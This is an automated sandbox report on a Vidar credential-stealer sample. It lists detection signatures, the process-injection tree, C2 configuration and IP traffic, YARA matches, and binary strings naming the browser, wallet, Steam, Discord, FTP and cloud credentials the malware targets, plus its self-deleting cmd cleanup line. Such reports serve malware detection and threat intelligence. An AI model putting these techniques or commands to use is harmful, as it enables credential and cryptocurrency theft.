Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
N11R7lRasm.exe

Overview

General Information

Sample name:N11R7lRasm.exe
renamed because original name is a hash value
Original sample name:9f680720826812af34cbc66e27e0281f.exe
Analysis ID:1614222
MD5:9f680720826812af34cbc66e27e0281f
SHA1:fb580afbf6fb913e83eea1fb99be9c95b6ec39d5
SHA256:19198e75f7c830441360a42b06e10415f4368300a7590c119c237ea8c67bf23e
Tags:exeuser-abuse_ch
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Vidar stealer
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Monitors registry run keys for changes
Searches for specific processes (likely to inject)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • N11R7lRasm.exe (PID: 4424 cmdline: "C:\Users\user\Desktop\N11R7lRasm.exe" MD5: 9F680720826812AF34CBC66E27E0281F)
    • BitLockerToGo.exe (PID: 6552 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
      • chrome.exe (PID: 3848 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 5300 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2468 --field-trial-handle=2372,i,16807786506752163932,14709765720490292279,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • msedge.exe (PID: 7632 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
        • msedge.exe (PID: 7868 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2608 --field-trial-handle=2468,i,12661693246344684828,3544474529301919065,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
      • cmd.exe (PID: 8060 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" & rd /s /q "C:\ProgramData\t0r90" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 3520 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • msedge.exe (PID: 7852 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 8180 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1876 --field-trial-handle=2028,i,10932699950084445446,663265973773707162,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 6340 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5252 --field-trial-handle=2028,i,10932699950084445446,663265973773707162,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 4480 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6648 --field-trial-handle=2028,i,10932699950084445446,663265973773707162,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 8088 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=5344 --field-trial-handle=2028,i,10932699950084445446,663265973773707162,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": "https://steamcommunity.com/profiles/76561199825403037", "Botnet": "oomaino5"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1855724656.000000000AB16000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      00000000.00000002.1855724656.000000000AB16000.00000004.00001000.00020000.00000000.sdmpMsfpayloads_msf_9Metasploit Payloads - file msf.war - contentsFlorian Roth
      • 0x0:$x1: 4d5a9000030000000
      00000003.00000003.1906846457.0000000000CA7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        00000003.00000002.2650827814.0000000000C93000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000002.1855724656.000000000AA40000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            Click to see the 15 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.2.BitLockerToGo.exe.400000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              3.2.BitLockerToGo.exe.400000.0.unpackinfostealer_win_vidar_strings_nov23Finds Vidar samples based on the specific stringsSekoia.io
              • 0x19f7f:$str01: MachineID:
              • 0x18f4f:$str02: Work Dir: In memory
              • 0x1a027:$str03: [Hardware]
              • 0x19f68:$str04: VideoCard:
              • 0x196c0:$str05: [Processes]
              • 0x196cc:$str06: [Software]
              • 0x18fe0:$str07: information.txt
              • 0x19cbc:$str08: %s\*
              • 0x19d09:$str08: %s\*
              • 0x191fd:$str11: Software\Martin Prikryl\WinSCP 2\Configuration
              • 0x19592:$str12: UseMasterPassword
              • 0x1a033:$str13: Soft: WinSCP
              • 0x19a6b:$str14: <Pass encoding="base64">
              • 0x1a016:$str15: Soft: FileZilla
              • 0x18fd2:$str16: passwords.txt
              • 0x195bd:$str17: build_id
              • 0x19684:$str18: file_data
              0.2.N11R7lRasm.exe.aa00000.2.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                0.2.N11R7lRasm.exe.aa00000.2.raw.unpackinfostealer_win_vidar_strings_nov23Finds Vidar samples based on the specific stringsSekoia.io
                • 0x19f7f:$str01: MachineID:
                • 0x18f4f:$str02: Work Dir: In memory
                • 0x1a027:$str03: [Hardware]
                • 0x19f68:$str04: VideoCard:
                • 0x196c0:$str05: [Processes]
                • 0x196cc:$str06: [Software]
                • 0x18fe0:$str07: information.txt
                • 0x19cbc:$str08: %s\*
                • 0x19d09:$str08: %s\*
                • 0x191fd:$str11: Software\Martin Prikryl\WinSCP 2\Configuration
                • 0x19592:$str12: UseMasterPassword
                • 0x1a033:$str13: Soft: WinSCP
                • 0x19a6b:$str14: <Pass encoding="base64">
                • 0x1a016:$str15: Soft: FileZilla
                • 0x18fd2:$str16: passwords.txt
                • 0x195bd:$str17: build_id
                • 0x19684:$str18: file_data
                0.2.N11R7lRasm.exe.aa40000.1.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                  Click to see the 11 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Browser Started with Remote Debugging
                  Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe", ParentImage: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, ParentProcessId: 6552, ParentProcessName: BitLockerToGo.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 3848, ProcessName: chrome.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-02-13T13:14:06.320535+010020287653Unknown Traffic192.168.2.84971377.239.117.222443TCP
                  2025-02-13T13:14:08.302308+010020287653Unknown Traffic192.168.2.84971477.239.117.222443TCP
                  2025-02-13T13:14:09.705451+010020287653Unknown Traffic192.168.2.84971577.239.117.222443TCP
                  2025-02-13T13:14:11.221673+010020287653Unknown Traffic192.168.2.84971677.239.117.222443TCP
                  2025-02-13T13:14:12.591051+010020287653Unknown Traffic192.168.2.84971777.239.117.222443TCP
                  2025-02-13T13:14:13.993701+010020287653Unknown Traffic192.168.2.84971877.239.117.222443TCP
                  2025-02-13T13:14:14.980465+010020287653Unknown Traffic192.168.2.84971977.239.117.222443TCP
                  2025-02-13T13:14:23.558298+010020287653Unknown Traffic192.168.2.84974377.239.117.222443TCP
                  2025-02-13T13:14:24.609780+010020287653Unknown Traffic192.168.2.84974677.239.117.222443TCP
                  2025-02-13T13:14:25.609911+010020287653Unknown Traffic192.168.2.84974777.239.117.222443TCP
                  2025-02-13T13:14:28.424092+010020287653Unknown Traffic192.168.2.84974877.239.117.222443TCP
                  2025-02-13T13:14:28.664535+010020287653Unknown Traffic192.168.2.84974977.239.117.222443TCP
                  2025-02-13T13:14:34.811776+010020287653Unknown Traffic192.168.2.84977877.239.117.222443TCP
                  2025-02-13T13:14:36.198286+010020287653Unknown Traffic192.168.2.84978577.239.117.222443TCP
                  2025-02-13T13:14:37.228290+010020287653Unknown Traffic192.168.2.84980577.239.117.222443TCP
                  2025-02-13T13:14:38.331639+010020287653Unknown Traffic192.168.2.84980877.239.117.222443TCP
                  2025-02-13T13:14:39.579656+010020287653Unknown Traffic192.168.2.84983977.239.117.222443TCP
                  2025-02-13T13:14:41.613947+010020287653Unknown Traffic192.168.2.84985377.239.117.222443TCP
                  2025-02-13T13:14:42.719407+010020287653Unknown Traffic192.168.2.84985977.239.117.222443TCP
                  2025-02-13T13:14:44.033073+010020287653Unknown Traffic192.168.2.84987077.239.117.222443TCP
                  2025-02-13T13:14:45.414706+010020287653Unknown Traffic192.168.2.84987677.239.117.222443TCP
                  2025-02-13T13:14:47.153833+010020287653Unknown Traffic192.168.2.84989177.239.117.222443TCP
                  2025-02-13T13:14:49.241451+010020287653Unknown Traffic192.168.2.84990477.239.117.222443TCP
                  2025-02-13T13:14:51.244913+010020287653Unknown Traffic192.168.2.84992077.239.117.222443TCP
                  2025-02-13T13:14:53.783868+010020287653Unknown Traffic192.168.2.84993677.239.117.222443TCP
                  2025-02-13T13:14:54.785015+010020287653Unknown Traffic192.168.2.84994677.239.117.222443TCP
                  2025-02-13T13:14:55.864441+010020287653Unknown Traffic192.168.2.84995777.239.117.222443TCP
                  2025-02-13T13:15:05.792448+010020287653Unknown Traffic192.168.2.85001377.239.117.222443TCP
                  2025-02-13T13:15:06.801812+010020287653Unknown Traffic192.168.2.85001977.239.117.222443TCP
                  2025-02-13T13:15:07.823708+010020287653Unknown Traffic192.168.2.85002577.239.117.222443TCP
                  2025-02-13T13:15:08.848024+010020287653Unknown Traffic192.168.2.85003677.239.117.222443TCP
                  2025-02-13T13:15:09.843569+010020287653Unknown Traffic192.168.2.85004277.239.117.222443TCP
                  2025-02-13T13:15:10.969232+010020287653Unknown Traffic192.168.2.85004877.239.117.222443TCP
                  2025-02-13T13:15:11.965266+010020287653Unknown Traffic192.168.2.85005677.239.117.222443TCP
                  2025-02-13T13:15:12.998853+010020287653Unknown Traffic192.168.2.85006577.239.117.222443TCP
                  2025-02-13T13:15:13.982676+010020287653Unknown Traffic192.168.2.85007177.239.117.222443TCP
                  2025-02-13T13:15:15.009550+010020287653Unknown Traffic192.168.2.85007777.239.117.222443TCP
                  2025-02-13T13:15:16.045855+010020287653Unknown Traffic192.168.2.85008877.239.117.222443TCP
                  2025-02-13T13:15:17.051263+010020287653Unknown Traffic192.168.2.85009477.239.117.222443TCP
                  2025-02-13T13:15:18.410583+010020287653Unknown Traffic192.168.2.85010077.239.117.222443TCP
                  2025-02-13T13:15:19.156806+010020287653Unknown Traffic192.168.2.85011177.239.117.222443TCP
                  2025-02-13T13:15:20.254884+010020287653Unknown Traffic192.168.2.85011777.239.117.222443TCP
                  2025-02-13T13:15:22.269139+010020287653Unknown Traffic192.168.2.85013377.239.117.222443TCP
                  2025-02-13T13:15:23.625478+010020287653Unknown Traffic192.168.2.85013977.239.117.222443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-02-13T13:14:11.939154+010020442471Malware Command and Control Activity Detected77.239.117.222443192.168.2.849716TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-02-13T13:14:13.302988+010020518311Malware Command and Control Activity Detected77.239.117.222443192.168.2.849717TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-02-13T13:14:13.302743+010020490871A Network Trojan was detected192.168.2.84971777.239.117.222443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-02-13T13:14:14.788875+010020593311Malware Command and Control Activity Detected192.168.2.84971877.239.117.222443TCP
                  2025-02-13T13:14:15.788444+010020593311Malware Command and Control Activity Detected192.168.2.84971977.239.117.222443TCP
                  2025-02-13T13:14:24.421499+010020593311Malware Command and Control Activity Detected192.168.2.84974377.239.117.222443TCP
                  2025-02-13T13:14:24.612701+010020593311Malware Command and Control Activity Detected192.168.2.84974677.239.117.222443TCP
                  2025-02-13T13:14:25.613156+010020593311Malware Command and Control Activity Detected192.168.2.84974777.239.117.222443TCP
                  2025-02-13T13:14:28.427836+010020593311Malware Command and Control Activity Detected192.168.2.84974877.239.117.222443TCP
                  2025-02-13T13:14:29.540817+010020593311Malware Command and Control Activity Detected192.168.2.84974977.239.117.222443TCP
                  2025-02-13T13:14:35.570688+010020593311Malware Command and Control Activity Detected192.168.2.84977877.239.117.222443TCP
                  2025-02-13T13:14:36.201011+010020593311Malware Command and Control Activity Detected192.168.2.84978577.239.117.222443TCP
                  2025-02-13T13:14:37.262248+010020593311Malware Command and Control Activity Detected192.168.2.84980577.239.117.222443TCP
                  2025-02-13T13:14:38.334833+010020593311Malware Command and Control Activity Detected192.168.2.84980877.239.117.222443TCP
                  2025-02-13T13:14:39.583274+010020593311Malware Command and Control Activity Detected192.168.2.84983977.239.117.222443TCP
                  2025-02-13T13:14:41.616709+010020593311Malware Command and Control Activity Detected192.168.2.84985377.239.117.222443TCP
                  2025-02-13T13:14:42.722601+010020593311Malware Command and Control Activity Detected192.168.2.84985977.239.117.222443TCP
                  2025-02-13T13:14:47.156858+010020593311Malware Command and Control Activity Detected192.168.2.84989177.239.117.222443TCP
                  2025-02-13T13:14:49.992403+010020593311Malware Command and Control Activity Detected192.168.2.84990477.239.117.222443TCP
                  2025-02-13T13:14:53.786877+010020593311Malware Command and Control Activity Detected192.168.2.84993677.239.117.222443TCP
                  2025-02-13T13:14:55.670395+010020593311Malware Command and Control Activity Detected192.168.2.84994677.239.117.222443TCP
                  2025-02-13T13:14:55.867222+010020593311Malware Command and Control Activity Detected192.168.2.84995777.239.117.222443TCP
                  2025-02-13T13:15:06.798034+010020593311Malware Command and Control Activity Detected192.168.2.85001377.239.117.222443TCP
                  2025-02-13T13:15:07.652352+010020593311Malware Command and Control Activity Detected192.168.2.85001977.239.117.222443TCP
                  2025-02-13T13:15:09.627554+010020593311Malware Command and Control Activity Detected192.168.2.85003677.239.117.222443TCP
                  2025-02-13T13:15:10.690954+010020593311Malware Command and Control Activity Detected192.168.2.85004277.239.117.222443TCP
                  2025-02-13T13:15:11.763041+010020593311Malware Command and Control Activity Detected192.168.2.85004877.239.117.222443TCP
                  2025-02-13T13:15:12.898020+010020593311Malware Command and Control Activity Detected192.168.2.85005677.239.117.222443TCP
                  2025-02-13T13:15:13.849928+010020593311Malware Command and Control Activity Detected192.168.2.85006577.239.117.222443TCP
                  2025-02-13T13:15:14.846912+010020593311Malware Command and Control Activity Detected192.168.2.85007177.239.117.222443TCP
                  2025-02-13T13:15:15.749863+010020593311Malware Command and Control Activity Detected192.168.2.85007777.239.117.222443TCP
                  2025-02-13T13:15:16.762880+010020593311Malware Command and Control Activity Detected192.168.2.85008877.239.117.222443TCP
                  2025-02-13T13:15:17.815295+010020593311Malware Command and Control Activity Detected192.168.2.85009477.239.117.222443TCP
                  2025-02-13T13:15:19.246474+010020593311Malware Command and Control Activity Detected192.168.2.85010077.239.117.222443TCP
                  2025-02-13T13:15:19.898210+010020593311Malware Command and Control Activity Detected192.168.2.85011177.239.117.222443TCP
                  2025-02-13T13:15:20.935469+010020593311Malware Command and Control Activity Detected192.168.2.85011777.239.117.222443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-02-13T13:14:24.612701+010028596361Malware Command and Control Activity Detected192.168.2.84974677.239.117.222443TCP
                  2025-02-13T13:14:25.613156+010028596361Malware Command and Control Activity Detected192.168.2.84974777.239.117.222443TCP
                  2025-02-13T13:14:28.427836+010028596361Malware Command and Control Activity Detected192.168.2.84974877.239.117.222443TCP
                  2025-02-13T13:14:36.201011+010028596361Malware Command and Control Activity Detected192.168.2.84978577.239.117.222443TCP
                  2025-02-13T13:14:37.262248+010028596361Malware Command and Control Activity Detected192.168.2.84980577.239.117.222443TCP
                  2025-02-13T13:14:38.334833+010028596361Malware Command and Control Activity Detected192.168.2.84980877.239.117.222443TCP
                  2025-02-13T13:14:39.583274+010028596361Malware Command and Control Activity Detected192.168.2.84983977.239.117.222443TCP
                  2025-02-13T13:14:41.616709+010028596361Malware Command and Control Activity Detected192.168.2.84985377.239.117.222443TCP
                  2025-02-13T13:14:42.722601+010028596361Malware Command and Control Activity Detected192.168.2.84985977.239.117.222443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-02-13T13:14:09.043514+010028593781Malware Command and Control Activity Detected192.168.2.84971477.239.117.222443TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus detection for URL or domain
                  Source: https://77.239.117.222/73Avira URL Cloud: Label: malware
                  Found malware configuration
                  Source: 00000000.00000002.1855724656.000000000AB16000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199825403037", "Botnet": "oomaino5"}
                  Multi AV Scanner detection for submitted file
                  Source: N11R7lRasm.exeReversingLabs: Detection: 29%
                  Source: N11R7lRasm.exeVirustotal: Detection: 25%Perma Link
                  Joe Sandbox ML detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00405FE7 CryptUnprotectData,LocalAlloc,LocalFree,3_2_00405FE7
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0040E7E9 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,GetLastError,GetProcessHeap,HeapFree,3_2_0040E7E9
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00406062 BCryptCloseAlgorithmProvider,BCryptDestroyKey,3_2_00406062
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0040627F LocalAlloc,BCryptDecrypt,3_2_0040627F
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0040609C BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,3_2_0040609C
                  Source: N11R7lRasm.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
                  Source: unknownHTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49745 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 77.239.117.222:443 -> 192.168.2.8:49713 version: TLS 1.2
                  Source: N11R7lRasm.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: A{"id":1,"method":"Storage.getCookies"}|.tgz.gzSecurityHistoryWork Dir: In memorySOFTWARE\Microsoft\Cryptographyfirefox%08lX%04lX%lu_key.txtSoft\Steam\steam_tokens.txt\Discord\tokens.txtpasswords.txtinformation.txtlocalhostWebSocketClient" & exitGdipGetImageHeightSoftGdipGetImagePixelFormatN0ZWFt\Monero\wallet.keysAzure\.awsstatusWallets_CreateProcessGdipGetImageEncodershttpsSoftware\Martin Prikryl\WinSCP 2\SessionsPlugins/devtoolsprefs.jsLocal Extension SettingsSync Extension SettingsFilescookiesCookies\BraveWallet\Preferenceskey_datas%s\%s\%sPortNumberCurrentBuildNumberGdiplusStartup.zipGdipCreateHBITMAPFromBitmapOpera Crypto.zooUnknownGdiplusShutdown/json_logins.jsoninvalid string positionSoftware\Martin Prikryl\WinSCP 2\ConfigurationDisplayVersionSOFTWARE\Microsoft\Windows NT\CurrentVersionopentokenamcommunity.comTelegramSoftware\Valve\SteamGdipSaveImageToStreamGdipLoadImageFromStream\AppData\Roaming\FileZilla\recentservers.xml.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallapprove_aprilNetworkblock.arjprofiles.ini.lzhGdipGetImageWidthwallet_pathSteamPathscreenshot.jpgstring too longvector<T> too longProcessorNameStringloginusers.vdflibraryfolders.vdfconfig.vdfDialogConfig.vdfDialogConfigOverlay*.vdfGdipGetImageEncodersSizesteam.exeC:\Windows\system32\cmd.exeC:\Windows\system32\rundll32.exeBravetrueformhistory.sqlitecookies.sqliteplaces.sqliteLocal StatefalseAzure\.azureSOFTWARE\monero-project\monero-corechromefile_nameDisplayNameHostNameProductNameUserNameGdipSaveImageToFilemsal.cacheGdipDisposeImagemodeAzure\.IdentityServiceUseMasterPasswordhwidMachineGuidtask_idbuild_idCrash DetectedDisabled%dx%d%d/%d/%d %d:%d:%d.arcvdr1.pdb\Local Storage\leveldb_0.indexeddb.leveldb_formhistory.db_history.db_cookies.db_passwords.db_webdata.db_key4.db\key4.dbfile_dataLogin DataWeb DataoperaOperachrome-extension_[Processes][Software]\storage\default\\.aws\errors\\Telegram Desktop\\Steam\\config\\.azure\ Stable\\.IdentityService\\discord\/c timeout /t 10 & rd /s /q "C:\ProgramData\" & rd /s /q "C:\ProgramData\\..\.ZDISPLAYOpera GXEXCEPTION_INT_OVERFLOWEXCEPTION_FLT_OVERFLOWEXCEPTION_STACK_OVERFLOWEXCEPTION_FLT_UNDERFLOWPOSTEXCEPTION_BREAKPOINT\Local Storage\leveldb\CURRENTEXCEPTION_DATATYPE_MISALIGNMENTEXCEPTION_FLT_INEXACT_RESULTGETEXCEPTION_IN_PAGE_ERRORdQw4w9WgXcQEXCEPTION_SINGLE_STEPGdipCreateBitmapFromHBITMAPEXCEPTION_INT_DIVIDE_BY_ZEROEXCEPTION_FLT_DIVIDE_BY_ZEROEXCEPTION_NONCONTINUABLE_EXCEPTIONUNKNOWN EXCEPTIONEXCEPTION_INVALID_DISPOSITIONEXCEPTION_PRIV_INSTRUCTIONEXCEPTION_ILLEGAL_INSTRUCTIONEXCEPTION_FLT_INVALID_OPERATIONEXCEPTION_ACCESS_VIOLATIONEXCEPTION_FLT_STACK_CHECKEXCEPTION_FLT_DENORMAL_OPERANDEXCEPTION_ARRAY_BOUNDS_EXCEEDED%d MBIndexedDBOCALAPPDATA?<Host><Port><User><Pass encoding="base64">http://localhost:"webSocketDebuggerUrl":6^userContextId=4294967295465 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73ws://localhost:9223.metadata-v2comctl32gdi32:225121Windows 11HTTP/1.1HARDWARE\DESCRIPTION\System\CentralProcessor\0abcdefgh
                  Source: Binary string: C:\Users\Administrator\Desktop\vdr1\Release\vdr1.pdbA source: N11R7lRasm.exe, 00000000.00000002.1855724656.000000000AB16000.00000004.00001000.00020000.00000000.sdmp, N11R7lRasm.exe, 00000000.00000002.1855724656.000000000AA40000.00000004.00001000.00020000.00000000.sdmp, N11R7lRasm.exe, 00000000.00000002.1852243141.000000000A8CE000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2650192251.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                  Source: Binary string: vdr1.pdb source: N11R7lRasm.exe, 00000000.00000002.1855724656.000000000AB16000.00000004.00001000.00020000.00000000.sdmp, N11R7lRasm.exe, 00000000.00000002.1855724656.000000000AA40000.00000004.00001000.00020000.00000000.sdmp, N11R7lRasm.exe, 00000000.00000002.1852243141.000000000A8CE000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, BitLockerToGo.exe, 00000003.00000002.2650192251.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                  Source: Binary string: BitLockerToGo.pdb source: N11R7lRasm.exe, 00000000.00000002.1855724656.000000000AADC000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: cryptosetup.pdbGCTL source: BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000CDB000.00000004.00000020.00020000.00000000.sdmp, f379r9.3.dr
                  Source: Binary string: cryptosetup.pdb source: BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000CDB000.00000004.00000020.00020000.00000000.sdmp, f379r9.3.dr
                  Source: Binary string: BitLockerToGo.pdbGCTL source: N11R7lRasm.exe, 00000000.00000002.1855724656.000000000AADC000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\Administrator\Desktop\vdr1\Release\vdr1.pdb source: N11R7lRasm.exe, 00000000.00000002.1855724656.000000000AB16000.00000004.00001000.00020000.00000000.sdmp, N11R7lRasm.exe, 00000000.00000002.1855724656.000000000AA40000.00000004.00001000.00020000.00000000.sdmp, N11R7lRasm.exe, 00000000.00000002.1852243141.000000000A8CE000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, BitLockerToGo.exe, 00000003.00000002.2650192251.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00407891 FindFirstFileA,CopyFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,FindNextFileA,FindClose,3_2_00407891
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0040A69C FindFirstFileA,StrCmpCA,CopyFileA,Sleep,DeleteFileA,FindNextFileA,FindClose,3_2_0040A69C
